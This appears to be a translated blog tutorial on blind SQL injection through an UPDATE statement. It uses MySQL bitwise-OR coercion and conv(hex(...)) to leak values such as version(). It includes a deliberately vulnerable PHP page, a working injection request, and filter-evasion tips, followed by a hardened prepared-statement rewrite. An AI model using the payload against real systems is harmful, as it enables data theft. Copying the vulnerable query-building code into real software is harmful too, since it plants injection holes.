UPDATE injection with error display turned off

Fear not the future, dwell not on the past. Thus, all is well!

Feng Zikai

MySQL behaviour: when a string and a number are combined with the bitwise OR operator, the result is a number (the string is coerced to 0, with a warning); this only works in non-strict mode.

mysql> select 'abc'|123;
+-----------+
| 'abc'|123 |
+-----------+
|       123 |
+-----------+
1 row in set, 1 warning (0.00 sec)

mysql> select user()|123;
+------------+
| user()|123 |
+------------+
|        123 |
+------------+
1 row in set (0.00 sec)

Suppose the following code exists:

<?php
// Vulnerable example: both query strings are built by concatenating raw GET input.
$mysqli = new mysqli("localhost", "root", "root", "security");
if ($mysqli->connect_errno) {
    printf("Connect failed: %s\n", $mysqli->connect_error);
    exit();
}
$mysqli->query("set names utf8");
$id = @$_GET['id'];
$username = @$_GET['username'];

// User input is interpolated directly into an UPDATE and a SELECT.
$sql1 = "update users set username='$username' where id='$id'";
var_dump($sql1);
$sql2 = "select * from users where id='$id'";
var_dump($sql2);

// The UPDATE's result is never checked, so an error in it is not reported.
$mysqli->query($sql1);
// The row is then read back, so whatever value was stored is shown to the user.
if ($result = $mysqli->query($sql2)) {
    $row = $result->fetch_array(MYSQLI_ASSOC);
    echo "ID=" . $id . '的用户名变为' . $row['username'];
    $result->close();
} else {
    var_dump($mysqli->error);
}

$mysqli->close();

id=1&username=tom'|conv(hex(version()),16,10)|'

With that request the injection succeeds. Of course the numeric value is limited to 64 bits, so a long string has to be split into pieces :)
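The root cause is the string concatenation in $sql1 and $sql2, not the bitwise OR trick itself. Below is an added hardened rewrite of the page above using mysqli prepared statements; it is not the original author's code. It keeps the page's connection parameters and the users/id/username names, and assumes the mysqlnd driver (needed for get_result()).

```php
<?php
// Added example (not from the original post): the same update page with
// parameterised queries, so user input never reaches the SQL parser as syntax.
$mysqli = new mysqli("localhost", "root", "root", "security");
if ($mysqli->connect_errno) {
    printf("Connect failed: %s\n", $mysqli->connect_error);
    exit();
}
$mysqli->set_charset("utf8");

// Validate id as an integer instead of trusting the raw query-string value.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
$username = $_GET['username'] ?? null;
if ($id === false || $id === null || $username === null) {
    http_response_code(400);
    exit("missing or invalid parameters");
}

// Bound parameters: a quote or a | operator inside $username is stored as a
// literal string, so the coercion trick from the post has nothing to act on.
$stmt = $mysqli->prepare("UPDATE users SET username = ? WHERE id = ?");
$stmt->bind_param("si", $username, $id);
if (!$stmt->execute()) {
    // Log server-side; do not echo $mysqli->error to the client.
    error_log("update failed: " . $stmt->error);
    $stmt->close();
    $mysqli->close();
    http_response_code(500);
    exit("update failed");
}
$stmt->close();

$stmt = $mysqli->prepare("SELECT username FROM users WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
$stmt->close();

if ($row !== null) {
    // Encode on output so a stored value cannot be reflected as HTML.
    echo "ID=" . (int)$id . " username is now "
        . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
}
$mysqli->close();
```

With this version the page's request `id=1&username=tom'|conv(hex(version()),16,10)|'` simply stores the 41-character string `tom'|conv(hex(version()),16,10)|'` as the username and reflects it back verbatim. Enabling strict sql_mode would make the coerced assignment fail, as the post notes, but it only changes how the injected expression behaves; it is not a substitute for binding parameters.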

Tags: SQL injection

Note!

Warning! This technique has some limitations: select, conv, etc., and parentheses may be filtered, so watch out for that!